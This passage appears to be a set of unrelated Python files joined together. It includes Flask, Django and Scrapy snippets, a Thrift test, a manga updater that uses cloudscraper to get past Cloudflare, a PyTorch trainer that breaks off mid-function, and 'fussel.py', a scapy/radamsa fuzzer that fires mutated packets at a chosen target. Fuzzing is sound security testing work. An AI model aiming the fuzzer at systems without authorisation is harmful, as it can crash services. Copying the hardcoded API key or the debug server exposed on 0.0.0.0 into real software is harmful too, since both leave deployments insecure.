def fish():
return render_template('fish.html')
@app.route('/jellyfish')
def jellyfish():
return render_template('jellyfish.html')
@app.route('/s')
@app.route('/secret')
@app.route('/s/<rotv>')
@app.route('/secret/<rotv>')
@app.route('/s/<rotv>/<encrypt>')
@app.route('/secret/<rotv>/<encrypt>')
def secret(rotv='0', encrypt='0'):
import rot
d={'to_encrypt':encrypt,
'rotval':rotv}
d['encrypted']=rot.rotx(encrypt,int(rotv))
return render_template("secret.html",d=d)
if __name__=='__main__':
app.debug=True
app.run(host='0.0.0.0', port=8000)
|
# ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
import json
import pkgutil
import unittest
from twitter.thrift.text import thrift_json_encoder
from gen.twitter.thrift.text.testing import ttypes as structs_for_testing
class ThriftJsonEncoderTest(unittest.TestCase):
def test_encode_thrift_to_json(self):
x = structs_for_testing.TestStruct()
x.field2 = True
x.field4 = [2, 4, 6, 8]
x.field7 = 1.2
expected1 = \
"""{
"field2": true,
"field4": [
2,
4,
6,
8
],
"field7": 1.2
}"""
json_str1 = thrift_json_encoder.thrift_to_json(x)
assert expected1 == json_str1
x.field1 = 42
x.field2 = False
x.field3 = '"not default"'
x.field4.append(10)
x.field5 = set(['b', 'c', 'a'])
x.field6 = structs_for_testing.InnerTestStruct()
x.field6.foo = "bar"
x.field6.color = structs_for_testing.Color.BLUE
expected2 = \
"""{
"field1": 42,
"field2": false,
"field3": "\\"not default\\"",
"field4": [
2,
4,
6,
8,
10
],
"field5": [
"a",
"b",
"c"
],
"field6": {
"color": 3,
"foo": "bar"
},
"field7": 1.2
}"""
json_str2 = thrift_json_encoder.thrift_to_json(x)
print(json_str2)
assert expected2 == json_str2
|
#!/usr/bin/python
# fussel.py is a stupid fuzzer. using pcap, scapy and radamsa
import scapy.all as scapy
from subprocess import Popen, PIPE
import ssl
import socket
import random
import time
import argparse
import sys
import os.path
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def is_valid_ip4(ip):
# some rudimentary checks if ip is actually a valid IP
octets = ip.split('.')
if len(octets) != 4:
return False
return octets[0] != 0 and all(0 <= int(octet) <= 255 for octet in octets)
def parse_args():
parser = argparse.ArgumentParser(description='simple stupid pcap fuzzer')
parser.add_argument('-t', '--target-ip', dest='target_ip', required=True, help='remote target IP')
parser.add_argument('-p', '--target-port', dest='target_port', required=True, help='remote target port')
parser.add_argument('-i', '--input-pcap', dest='input_pcap', required=True, help='input pcap file')
parser.add_argument('-f', '--fuzz_factor', dest='fuzz_factor', required=False, help='fuzz factor, default: 50', default=50.0)
parser.add_argument('-r', '--radamsa_path', dest='radamsa_path', required=False, help='path to radamsa binary', default='/usr/bin/radamsa')
parser.add_argument('-v', '--verbose', dest='verbose', default=False,action='store_true',help='More verbose output of status information')
return parser.parse_args()
def print_buf(counter, buf):
buf2 = [('%02x' % ord(i)) for i in buf]
print '{0}: {1:<39} {2}'.format(('%07x' % (counter * 16)),
' '.join([''.join(buf2[i:i + 2]) for i in range(0, len(buf2), 2)]),
''.join([c if c in string.printable[:-5] else '.' for c in buf]))
def hexdump(data, length=12):
# this is a pretty hex dumping function directly taken from
# http://code.activestate.com/recipes/142812-hex-dumper/
result = []
digits = 4 if isinstance(data, unicode) else 2
for i in xrange(0, len(data), length):
s = data[i:i + length]
hexa = b' '.join(["%0*X" % (digits, ord(x)) for x in s])
text = b''.join([x if 0x20 <= ord(x) < 0x7F else b'.' for x in s])
result.append(b"%04X %-*s %s" % (i, length * (digits + 1), hexa, text))
print b'\n'.join(result)
def launch_radamsa(payload, radamsa_path):
radamsa = [radamsa_path, '-n', '1', '-']
p = Popen(radamsa, stdin=PIPE, stdout=PIPE)
p.stdin.write(payload)
p.stdin.close()
p.wait()
mutated_data = p.stdout.read()
return mutated_data
def log_data(event, log_data):
log_output = log_data = '\n'
if event is 'fuzzing':
try:
file_d = open('fuzzing.log', 'a')
except IOError as err:
return "[!] Error opening log file: %s" % str(err)
elif event is 'error':
try:
file_d = open('error.log', 'a')
except IOError as err:
return "[!] Error opening error file: %s" % str(err)
if file_d:
file_d.write(log_output)
return
def main():
clientsIP_list = []
serversIP_list = []
fuzz_list = []
random.seed(time.time())
'''
parsing arguments
'''
args = parse_args()
if not is_valid_ip4(args.target_ip):
sys.exit(1)
else:
target_ip = args.target_ip
if os.path.isfile(args.input_pcap):
input_pcap_filename = args.input_pcap
else:
sys.exit(2)
if os.path.isfile(args.radamsa_path):
radamsa_path = args.radamsa_path
else:
sys.exit(3)
fuzz_factor = args.fuzz_factor
target_port = args.target_port
print '[!] Analyizing PCAP: ' + input_pcap_filename
packets = scapy.rdpcap(input_pcap_filename)
print '[+] Identified %d packets in PCAP' % len(packets)
time.sleep(1)
count = 0
for pkt in packets:
''' Only interested if pkt starts with SYN flag. Hosts sending SYN will be clients, the DstIP will be servers'''
if count is 0:
if pkt['TCP'].sprintf('%TCP.flags%') == 'S':
clientsIP_list.append(pkt['IP'].src)
serversIP_list.append(pkt['IP'].dst)
count += 1
try:
if pkt['Raw']:
'''
Check for information flow direction. At this point, I am only interessted in mutating data send to the target.
'''
if pkt['IP'].src in clientsIP_list:
print '[+] Identified data to fuzz in packet: %d' % count
fuzz_list.append((count, str(pkt['Raw'])))
except IndexError:
continue
fuzz_count = 0
while True:
print bcolors.OKGREEN + '[+] Fuzzing: %d ' % fuzz_count + bcolors.ENDC
try:
fuzz_count += 1
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(2)
''' in case the server uses TLS '''
sock.connect((target_ip, int(target_port)))
#ssl_sock = ssl.wrap_socket(sock)
#ssl_sock.connect((target_ip, int(target_port)))
for pkt in fuzz_list:
fuzz_payload = pkt[1]
''' fuzz payload? '''
ran = random.random()
if ran < float(fuzz_factor) / 100:
fuzz_payload = launch_radamsa(fuzz_payload, radamsa_path)
#log_data('fuzzing', fuzz_payload)
if args.verbose is True:
hexdump(fuzz_payload, 16)
sock.send(fuzz_payload)
#sock.recv(1024)
#sock.close()
except IOError, e:
#print str(e)
continue
except Exception as error:
error_str = bcolors.FAIL + '[!!!] Error during fuzz iteration #%d\nError Message: %s' %(fuzz_count, str(error)) + bcolors.ENDC
print error_str
if __name__ == '__main__':
main()
|
from .models import UserAccount, EventPlace, EventPlaceSeatType, Contract, Ticket
from django.contrib.auth.models import Group
from django.contrib import admin
from django import forms
class EventPlaceAdmin(admin.ModelAdmin):
list_display = ('name', 'adress', 'open_air')
list_filter = ('name',)
class ContractAdmin(admin.ModelAdmin):
list_display = ('event_title', 'event_date', 'event_place')
change_form_template = 'admin/contract_forms.html'
admin.site.site_header = 'Панель управления:'
admin.site.register(UserAccount)
admin.site.register(EventPlace, EventPlaceAdmin)
admin.site.register(EventPlaceSeatType)
admin.site.register(Contract, ContractAdmin)
admin.site.register(Ticket)
admin.site.unregister(Group) |
#_*_ coding:utf-8 _*_
#怎么执行程序 :scray crawl pursuit(这是自己指定的爬虫名)
#scrapy crawl pursuit -o pursuit_teacher.json -t json
import scrapy
from mySpider.items import PursuitItem
class PursuitSpider(scrapy.spiders.Spider):
#这些名称都是内置的
name = "pursuit"
allowd_damains = ["http://itcast.cn"]
start_urls = ["http://www.itcast.cn/channel/teacher.shtml#ac"]
def parse(self,response):
# file_name = "teacher.html"
# open(file_name,"wb+").write(response.body)
items = []
for site in response.xpath('//div[@class="li_txt"]'):
teacher_name = site.xpath('h3/text()').extract()
teacher_level = site.xpath('h4/text()').extract()
teacher_info = site.xpath('p/text()').extract()
item = PursuitItem()
item['name'] = teacher_name
item['level'] = teacher_level
item['info'] = teacher_info
items.append(item)
return items
|
from django.contrib.gis import admin
from world.models import WorldBorder
admin.site.register(WorldBorder, admin.OSMGeoAdmin)
# admin.site.register(WorldBorder, admin.GeoModelAdmin)
|
import cloudscraper
import time, os, sys, re, json, html
mangas = []
def remove_special_char(str):
return ''.join(e for e in str if e.isalnum())
def pad_filename(str):
digits = re.compile('(\\d+)')
pos = digits.search(str)
if pos:
return str[1:pos.start()] + pos.group(1).zfill(3) + str[pos.end():]
else:
return str
def float_conversion(x):
y = x[0]
try:
y = float(y)
except ValueError: # empty string for oneshot
y = 0
return y
def update(category, index, manga_id, lang_code, tld="org"):
global mangas
# grab manga info json from api
scraper = cloudscraper.create_scraper()
try:
r = scraper.get(mangas[category][index]["url"])
manga = json.loads(r.text)
# print(manga)
except (json.decoder.JSONDecodeError, ValueError) as err:
print("CloudFlare error: {}".format(err))
exit(1)
try:
title = manga["manga"]["title"]
title = remove_special_char(title)
except:
print("Please enter a MangaDex manga (not chapter) URL.")
exit(1)
# print("\nTitle: {}".format(html.unescape(title)))
# check available chapters
chapters = []
if "chapter" not in manga:
print("Chapter not found in the language you requested.")
exit(1)
for chap in manga["chapter"]:
if manga["chapter"][str(chap)]["lang_code"] == lang_code:
chapters.append((manga["chapter"][str(chap)]["chapter"], manga["chapter"][str(chap)]["timestamp"]))
chapters.sort(key=float_conversion) # sort numerically by chapter #
chapters_revised = ["Oneshot" if x == "" else x for x in chapters]
recently_updated = []
to_download = []
recent_update = mangas[category][index]['recent_update']
mostrecent = mangas[category][index]['recent_update']
# print(chapters_revised)
for chapter, timestamp in chapters_revised:
if int(timestamp) > recent_update:
if int(timestamp) > mostrecent:
mostrecent = int(timestamp)
recently_updated.append(chapter)
# print(recently_updated)
recently_read = float(mangas[category][index]['recent_read'])
if recently_read == 0:
if chapter == '':
to_download.append(chapter)
if chapter != '':
if recently_read < float(chapter):
to_download.append(chapter)
if manga['manga']['cover_url'].rsplit('/',1)[1] != mangas[category][index]['cover_url'].rsplit('/',1)[1]:
mangas[category][index]['cover_url'] = mangas[category][index]['cover_url'].rsplit('/',1)[0] + '/' + manga['manga']['cover_url'].rsplit('/',1)[1]
mangas[category][index]['recent_update'] = mostrecent
mangas[category][index]['new_update'] = recently_updated
with open('profile.json', 'w') as outfile:
json.dump(mangas, outfile)
# print(recently_updated)
# print(to_download)
return recently_updated, to_download
def update_all_mangas(category):
lang_code = "gb"
global mangas
with open('profile.json', 'r') as infile:
mangas = json.load(infile)
# with open('profile.json', 'r') as infile:
# mangas = json.load(infile)
# url = ""
# while url == "":
# url = input("Enter new manga url or none for done: ").strip()
# if url == "none":
# break
# manga_id = re.search("[0-9]+", url).group(0)
# split_url = url.split("/")
# for segment in split_url:
# if "mangadex" in segment:
# url = segment.split('.')
# title_url = "https://mangadex.{}/api/manga/{}/".format(url[1], manga_id)
# new = {
# "title": split_url[-1],
# "title_id": manga_id,
# "url": title_url,
# "cover_url": 'TODO make this input during making of frontend',
# "recent_read": 0,
# "recent_update": 0,
# "tld": url[1]
# }
# mangas.append(new)
# with open('profile.json', 'w') as outfile:
# json.dump(mangas, outfile)
mangacat = mangas[category]
updated_chapters = {}
to_download_chapters = {}
for i, manga in enumerate(mangacat):
try:
updates, to_download = update(category, i, manga['title_id'], lang_code, manga['tld'])
updated_chapters[manga['title']] = updates
to_download_chapters[manga['title']] = to_download
except:
print("Error with URL.")
print("update finished!")
return updated_chapters, to_download_chapters
if __name__ == "__main__":
update_all_mangas(0)
|
from django.db.models.signals import post_save
from django.contrib.auth.models import User, Group
from .models import Subscriber
def subscriber_profile(sender, instance, created, **kwargs):
if created:
Subscriber.objects.create(
user=instance,
)
post_save.connect(subscriber_profile, sender=User)
|
import csv
import urllib.request
import json
import requests
from flask import redirect, render_template, request, session
from functools import wraps
from cs50 import SQL
from passlib.apps import custom_app_context as pwd_context
import smtplib
import random
db = SQL("sqlite:///games.db")
def login_required(f):
"""
Decorate routes to require login.
http://flask.pocoo.org/docs/0.12/patterns/viewdecorators/
"""
@wraps(f)
def decorated_function(*args, **kwargs):
if session.get("user_id") is None:
return redirect("/login")
return f(*args, **kwargs)
return decorated_function
def lookup(name):
# get game data via database API by searching gamename
url = 'https://api-v3.igdb.com/games/'
headers = {'user-key': '663bdc9cdfcbb5aaae5a2a8a14b4d70a'}
data = f'search "{name}"; fields name, rating, summary;'
r = requests.get(url, headers=headers, json={"key": "value"}, data=data)
if not r:
return None
return r.json()
def delete_account(user_id):
# delete user
db.execute("DELETE FROM users WHERE id =:id", id=user_id)
return "Done"
def check_register(username, email, password):
temp_email = db.execute("SELECT * FROM users WHERE email=:email", email=email)
temp_username = db.execute("SELECT * FROM users WHERE username=:username", username=username)
if len(temp_email) == 1:
return None
elif len(temp_username) == 1:
return None
else:
newUser = db.execute("INSERT INTO users (username, hash, email) VALUES (:username, :hash, :email)",
username=username, hash=pwd_context.hash(password), email=email)
return "Done"
def addgame(game, user_id, rating, status):
# select game user searches. if no error add to database
temp = db.execute("SELECT * FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=game["name"])
if temp:
return "error"
else:
db.execute("INSERT INTO games (name, rating, user_id, status, userrating) VALUES (:name, :rating, :user_id, :status, :userrating)",
name=game["name"], rating=game["rating"], user_id=user_id, status=status, userrating=rating)
def get_games(user_id, status):
# select games if games in all games (*) or if it has a status
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status", user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def update_game(user_id, game, status, rating):
to_update = game["name"]
if rating == None or rating == "":
rating = db.execute("SELECT userrating FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=to_update)
rating = rating[0]["userrating"]
if status == "select":
status = db.execute("SELECT status FROM games WHERE user_id=:user_id AND name=:name", user_id=user_id, name=to_update)
status = status[0]["status"]
db.execute("UPDATE games SET status=:status WHERE user_id=:user_id AND name=:name",
status=status, user_id=user_id, name=to_update)
db.execute("UPDATE games SET userrating=:userrating WHERE user_id=:user_id AND name=:name",
userrating=rating, user_id=user_id, name=to_update)
return "Done"
def remove_game(name, user_id):
# delete game from user's account
db.execute("DELETE FROM games WHERE name=:name AND user_id=:user_id", name=name, user_id=user_id)
def lookup_name(name):
# search user by username
temp = db.execute("SELECT id FROM users WHERE username=:username", username=name)
if temp == []:
return None
else:
return temp
def sortrating(user_id, status):
# order games via rating if game has a status or if it is in all games (*)
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id ORDER BY userrating DESC", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status ORDER BY userrating DESC",
user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def sortalfa(user_id, status):
# order games via name if game has a status or if it is in all games (*)
if status == "*":
games = db.execute("SELECT * FROM games WHERE user_id=:user_id ORDER BY name ASC", user_id=user_id)
else:
games = db.execute("SELECT * FROM games WHERE user_id=:user_id AND status=:status ORDER BY name ASC",
user_id=user_id, status=status)
# give game a number and strip decimals in the rating
i = 1
for game in games:
game["rating"] = str(game["rating"]).split('.')[0]
game["counter"] = i
i += 1
return games
def tip_input(user_id, game, user_tip):
game_tip = game
username_tipper = db.execute("SELECT username FROM users WHERE id=:id", id=user_id)
username_tipper = username_tipper[0]["username"]
test_tip = db.execute("SELECT id FROM users WHERE username=:username", username=user_tip)
if test_tip == []:
return None
else:
username = user_tip
id = test_tip[0]["id"]
db.execute("INSERT INTO tips(username,id,game,username_tipper) VALUES (:username, :id, :game, :username_tipper)",
username=username, id=id, game=game_tip, username_tipper=username_tipper)
return "Done"
def get_tips(user_id):
games = db.execute("SELECT * FROM tips WHERE id=:id", id=user_id)
return games
def change(user_id, what, new):
if what == "email":
check = db.execute("SELECT * FROM users WHERE email=:email", email=new)
if check != []:
return None
db.execute("UPDATE users SET email=:email WHERE id=:id", email=new, id=user_id)
if what == "password":
db.execute("UPDATE users SET hash=:hash WHERE id=:id", hash=pwd_context.hash(new), id=user_id)
if what == "username":
check = db.execute("SELECT * FROM users WHERE username=:username", username=new)
if check != []:
return None
db.execute("UPDATE users SET username=:username WHERE id=:id", username=new, id=user_id)
return "Done"
def check(email, username):
valid = db.execute("SELECT email FROM users WHERE username=:username", username=username)
valid = valid[0]["email"]
if valid != email:
return None
else:
return "Done"
def code(code):
code = random.randint(1000000, 100000000)
db.execute("UPDATE users SET code= :code WHERE username=:username and email=:email",
code=code, username=request.form.get("username"), email=request.form.get("email"))
return code
def delete2(username):
print("DELETING OLD CODE")
db.execute("UPDATE users SET code=:code WHERE username=:username", code=0, username=username)
return "Done"
def update_password(newpassword, username, code):
newcode = db.execute("SELECT code FROM users WHERE username=:username", username=username)
newcode = newcode[0]["code"]
if code != newcode or code == 0:
return None
else:
print("____ UPDATING HASH____")
print(username)
db.execute("UPDATE users SET hash=:hash WHERE username=:username", hash=pwd_context.hash(newpassword), username=username)
return "Done"
|
from utils.api import fetch_from_api
from datetime import datetime
from utils.api.scoring import score_videos
from utils.mysql.get import get_videos
from utils.mysql.connect import get_mysql
def get_published_datetime(published):
return datetime.strptime(published, "%Y-%m-%dT%H:%M:%SZ")
def search(query, pages=1, max=50, starting_token='', threshold=0.0):
s = []
counts = {}
if starting_token == '':
s = fetch_from_api.search_videos(query, pages, max)
else:
s = fetch_from_api.search_videos(query, pages, max, starting_token)
# print('{} videos fetched'.format(len(s)))
counts['API'] = len(s)
not_exists = []
video_data = get_videos(get_mysql(), from_flask=False)
video_ids = list(map(lambda x: x['video_id'], video_data))
for v in s:
if v['video_id'] not in video_ids:
# if not video_exists(get_mysql(), v['video_id'], from_flask=False):
not_exists.append(v)
# print('{} not already existing videos found'.format(len(not_exists)))
counts['non-existing'] = len(not_exists)
scores = score_videos(not_exists, search_tags=False)
videos_json = {}
# print('Fetching extended data and filtering by score (threshold={})... '.format(threshold), end='')
for v in not_exists:
if scores[v['video_id']] > threshold:
details = fetch_from_api.get_video_by_id(v['video_id'])
videos_json[v['video_id']] = details
else:
pass
# print('Filtered Out (1): {}\t{}'.format(v['video_id'], v['video_title']))
#print('{} videos after filter'.format(len(videos_json)))
counts['filter 1'] = len(videos_json)
print('---Stats---')
for k, v in counts.items():
print('{}: {}'.format(k, v))
return videos_json
|
from django.contrib import admin
from .models import Wishlist
# Register your models here.
# admin.site.register(Wishlist)
|
# -*- coding: utf-8 -*-
#!/usr/bin/env python
# Reto:
"""
Reto #7 “Edad futura y pasada”
Instrucciones: pide al usuario que indique su nombre y su edad.
Como mensaje de salida le indicarás que edad tuvo el año pasado y cuantos años tendrá el siguiente año.
Ejemplo: [nombre] el año pasado tenías X años y el próximo año cumplirás Y años.
"""
def main():
name = str(raw_input("Ingrese su nombre y presione ENTER: "))
years_old = int(raw_input("Ingrese su edad y presione ENTER: "))
last_year = years_old -1
next_year = years_old +1
print("{} el año pasado tenías {} y el próximo año cumplirás {}.".format(name, last_year, next_year))
if __name__ == '__main__':
main() |
import pprint
import eng_to_ipa as ipa
from time import sleep
class WordPronunciationPairs :
def __init__(self,word:str):
self.word = word;
self.pronunciation = ipa.convert(word)
def __repr__(self):
return self
def cleanbaby():
inpFile = open("./wordlist/babynames.txt",'r')
lines = inpFile.read().split("\n") # splitting doc into lines
names = [x.split(",")[1][1:-2] for x in lines if(x!="")] # splitting lines into names of format 123,"123",...
longnames = [ x for x in names if(len(x)>5) ] # just handpicking names size > 5
longnames = sorted(set(longnames)) # sorting and removing duplicates
open("./wordlist/cleanedbabynames1.txt",'w').write("\n".join(longnames))# writing back to the doc
return None
def cleanGoogle():
inpFile = open("./wordlist/googleWords.txt",'r')
lines = inpFile.read().split("\n") # splitting doc into lines
#names = [x.split(",")[1][1:-2] for x in lines if(x!="")] # splitting lines into names of format 123,"123",...
longnames = [ WordPronunciationPairs(x) for x in lines if(len(x)>5) ] # just handpicking names size > 5
longnames = sorted(set(longnames),key=lambda x:x.pronunciation) # sorting and removing duplicates
uniqueWords = []
i = 0
while i < (len(longnames)):
#sleep(0.1)
srcWord = longnames[i]
uniqueWords.append(srcWord)
pronunciation = ipa.convert
minMatchCount = int(0.8*len(srcWord.pronunciation))
print(i)
for j in range(i+1,len(longnames)):
if srcWord.pronunciation[:minMatchCount] != longnames[j].pronunciation[:minMatchCount] :
#uniqueWords.append(longnames[j])
i=j
break
else:
i+=1
if(i==len(longnames)-1):
uniqueWords.append(longnames[i])
i+=1
open("./wordlist/cleanGoogleWords.txt",'w').write("\n".join([x.word for x in longnames]))# writing back to the doc
open("./wordlist/cleanGoogleWords2.txt",'w').write("\n".join([x.word for x in uniqueWords]))# writing back to the doc
return None
cleanGoogle() |
from __future__ import absolute_import, division, print_function, unicode_literals
import six
import logging
from collections import OrderedDict
import numpy as np
import torch
import torch.optim as optim
from torch.utils.data import TensorDataset, DataLoader
from torch.utils.data.sampler import SubsetRandomSampler
from torch.nn.utils import clip_grad_norm_
logger = logging.getLogger(__name__)
class EarlyStoppingException(Exception):
pass
class NanException(Exception):
pass
class Trainer(object):
""" Trainer class. Any subclass has to implement the forward_pass() function. """
def __init__(self, model, run_on_gpu=True, double_precision=False):
self.model = model
self.run_on_gpu = run_on_gpu and torch.cuda.is_available()
self.device = torch.device("cuda" if self.run_on_gpu else "cpu")
self.dtype = torch.double if double_precision else torch.float
self.model = self.model.to(self.device, self.dtype)
logger.debug(
"Training on %s with %s precision",
"GPU" if self.run_on_gpu else "CPU",
"double" if double_precision else "single",
)
def train(
self,
data,
loss_functions,
loss_weights=None,
loss_labels=None,
epochs=50,
batch_size=100,
optimizer=optim.Adam,
optimizer_kwargs=None,
initial_lr=0.001,
final_lr=0.0001,
validation_split=0.25,
early_stopping=True,
early_stopping_patience=None,
clip_gradient=10.0,
verbose="some",
):
logger.debug("Initialising training data")
self.check_data(data)
self.report_data(data)
data_labels, dataset = self.make_dataset(data)
train_loader, val_loader = self.make_dataloaders(dataset, validation_split, batch_size)
logger.debug("Setting up optimizer")
optimizer_kwargs = {} if optimizer_kwargs is None else optimizer_kwargs
opt = optimizer(self.model.parameters(), lr=initial_lr, **optimizer_kwargs)
early_stopping = early_stopping and (validation_split is not None) and (epochs > 1)
best_loss, best_model, best_epoch = None, None, None
if early_stopping and early_stopping_patience is None:
logger.debug("Using early stopping with infinite patience")
elif early_stopping:
logger.debug("Using early stopping with patience %s", early_stopping_patience)
else:
logger.debug("No early stopping")
n_losses = len(loss_functions)
loss_weights = [1.0] * n_losses if loss_weights is None else loss_weights
# Verbosity
if verbose == "all": # Print output after every epoch
n_epochs_verbose = 1
elif verbose == "many": # Print output after 2%, 4%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 50, 0)), 1)
elif verbose == "some": # Print output after 10%, 20%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 20, 0)), 1)
elif verbose == "few": # Print output after 20%, 40%, ..., 100% progress
n_epochs_verbose = max(int(round(epochs / 5, 0)), 1)
elif verbose == "none": # Never print output
n_epochs_verbose = epochs + 2
else:
raise ValueError("Unknown value %s for keyword verbose", verbose)
logger.debug("Will print training progress every %s epochs", n_epochs_verbose)
logger.debug("Beginning main training loop")
losses_train, losses_val = [], []
# Loop over epochs
for i_epoch in range(epochs):
logger.debug("Training epoch %s / %s", i_epoch + 1, epochs)
lr = self.calculate_lr(i_epoch, epochs, initial_lr, final_lr)
self.set_lr(opt, lr)
logger.debug("Learning rate: %s", lr)
try:
loss_train, loss_val, loss_contributions_train, loss_contributions_val = self.epoch(
i_epoch, data_labels, train_loader, val_loader, opt, loss_functions, loss_weights, clip_gradient
)
losses_train.append(loss_train)
losses_val.append(loss_val)
except NanException:
logger.info("Ending training during epoch %s because NaNs appeared", i_epoch + 1)
break
if early_stopping:
try:
best_loss, best_model, best_epoch = self.check_early_stopping(
best_loss, best_model, best_epoch, loss_val, i_epoch, early_stopping_patience
)
except EarlyStoppingException:
logger.info("Early stopping: ending training after %s epochs", i_epoch + 1)
break
verbose_epoch = (i_epoch + 1) % n_epochs_verbose == 0
self.report_epoch(
i_epoch,
loss_labels,
loss_train,
loss_val,
loss_contributions_train,
loss_contributions_val,
verbose=verbose_epoch,
)
if early_stopping and len(losses_val) > 0:
self.wrap_up_early_stopping(best_model, losses_val[-1], best_loss, best_epoch)
logger.debug("Training finished")
return np.array(losses_train), np.array(losses_val)
@staticmethod
def report_data(data):
logger.debug("Training data:")
for key, value in six.iteritems(data):
logger.debug(
" %s: shape %s, first %s, mean %s, min %s, max %s",
key,
value.shape,
value[0],
np.mean(value, axis=0),
np.min(value, axis=0),
np.max(value, axis=0),
)
@staticmethod
def check_data(data):
pass
@staticmethod
def make_dataset(data):
tensor_data = []
data_labels = []
for key, value in six.iteritems(data):
data_labels.append(key)
tensor_data.append(torch.from_numpy(value))
dataset = TensorDataset(*tensor_data)
return data_labels, dataset
def make_dataloaders(self, dataset, validation_split, batch_size):
if validation_split is None or validation_split <= 0.0:
train_loader = DataLoader(dataset, batch_size=batch_size, shuffle=True, pin_memory=self.run_on_gpu)
val_loader = None
else:
assert 0.0 < validation_split < 1.0, "Wrong validation split: {}".format(validation_split)
n_samples = len(dataset)
indices = list(range(n_samples))
split = int(np.floor(validation_split * n_samples))
np.random.shuffle(indices)
train_idx, valid_idx = indices[split:], indices[:split]
train_sampler = SubsetRandomSampler(train_idx)
val_sampler = SubsetRandomSampler(valid_idx)
train_loader = DataLoader(dataset, sampler=train_sampler, batch_size=batch_size, pin_memory=self.run_on_gpu)
val_loader = DataLoader(dataset, sampler=val_sampler, batch_size=batch_size, pin_memory=self.run_on_gpu)
return train_loader, val_loader
@staticmethod
def calculate_lr(i_epoch, n_epochs, initial_lr, final_lr):
if n_epochs == 1:
return initial_lr
return initial_lr * (final_lr / initial_lr) ** float(i_epoch / (n_epochs - 1.0))
@staticmethod
def set_lr(optimizer, lr):
for param_group in optimizer.param_groups:
param_group["lr"] = lr
def epoch(
self,
i_epoch,
data_labels,
train_loader,
val_loader,
optimizer,
loss_functions,
loss_weights,
clip_gradient=None,
):
n_losses = len(loss_functions)
self.model.train()
loss_contributions_train = np.zeros(n_losses)
loss_train = 0.0
for i_batch, batch_data in enumerate(train_loader):
batch_data = OrderedDict(list(zip(data_labels, batch_data)))
batch_loss, batch_loss_contributions = self.batch_train(
batch_data, loss_functions, loss_weights, optimizer, clip_gradient
)
loss_train += batch_loss
for i, batch_loss_contribution in enumerate(batch_loss_contributions):
loss_contributions_train[i] += batch_loss_contribution
loss_contributions_train /= len(train_loader)
loss_train /= len(train_loader)
if val_loader is not None:
self.model.eval()
loss_contributions_val = np.zeros(n_losses)
loss_val = 0.0
for i_batch, batch_data in enumerate(val_loader):
batch_data = OrderedDict(list(zip(data_labels, batch_data)))
batch_loss, batch_loss_contributions = self.batch_val(batch_data, loss_functions, loss_weights)
loss_val += batch_loss
for i, batch_loss_contribution in enumerate(batch_loss_contributions):
loss_contributions_val[i] += batch_loss_contribution
loss_contributions_val /= len(val_loader)
loss_val /= len(val_loader)
else:
loss_contributions_val = None
loss_val = None
return loss_train, loss_val, loss_contributions_train, loss_contributions_val
def batch_train(self, batch_data, loss_functions, loss_weights, optimizer, clip_gradient=None):
loss_contributions = self.forward_pass(batch_data, loss_functions)
loss = self.sum_losses(loss_contributions, loss_weights)
self.optimizer_step(optimizer, loss, clip_gradient)
loss = loss.item()
loss_contributions = [contrib.item() for contrib in loss_contributions]
return loss, loss_contributions
def batch_val(self, batch_data, loss_functions, loss_weights):
loss_contributions = self.forward_pass(batch_data, loss_functions)
loss = self.sum_losses(loss_contributions, loss_weights)
loss = loss.item()
loss_contributions = [contrib.item() for contrib in loss_contributions]
return loss, loss_contributions
def forward_pass(self, batch_data, loss_functions):
"""
Forward pass of the model. Needs to be implemented by any subclass.
Parameters
----------
batch_data : OrderedDict with str keys and Tensor values
The data of the minibatch.
loss_functions : list of function
Loss functions.
Returns
-------
losses : list of Tensor
Losses as scalar pyTorch tensors.
"""
raise NotImplementedError
@staticmethod
def sum_losses(contributions, weights):
loss = weights[0] * contributions[0]
for _w, _l in zip(weights[1:], contributions[1:]):
loss = loss + _w * _l
return loss
def optimizer_step(self, optimizer, loss, clip_gradient):
optimizer.zero_grad()
loss.backward()
if clip_gradient is not None:
clip_grad_norm_(self.model.parameters(), clip_gradient)
optimizer.step()
def check_early_stopping(self, best_loss, best_model, best_epoch, loss, i_epoch, early_stopping_patience=None):
if best_loss is None or loss < best_loss:
best_loss = loss
best_model = self.model.state_dict()
best_epoch = i_epoch
if early_stopping_patience is not None and i_epoch - best_epoch > early_stopping_patience >= 0:
raise EarlyStoppingException
if loss is None or not np.isfinite(loss):
raise EarlyStoppingException
return best_loss, best_model, best_epoch
@staticmethod
def report_epoch(
i_epoch, loss_labels, loss_train, loss_val, loss_contributions_train, loss_contributions_val, verbose=False
):
logging_fn = logger.info if verbose else logger.debug
def contribution_summary(labels, contributions):
summary = ""
for i, (label, value) in enumerate(zip(labels, contributions)):
if i > 0:
summary += ", "
summary += "{}: {:>6.3f}".format(label, value)
return summary
train_report = "Epoch {:>3d}: train loss {:>8.5f} ({})".format(
i_epoch + 1, loss_train, contribution_summary(loss_labels, loss_contributions_train)
)
logging_fn(train_report)
if loss_val is not None:
val_report = " val. loss {:>8.5f} ({})".format(
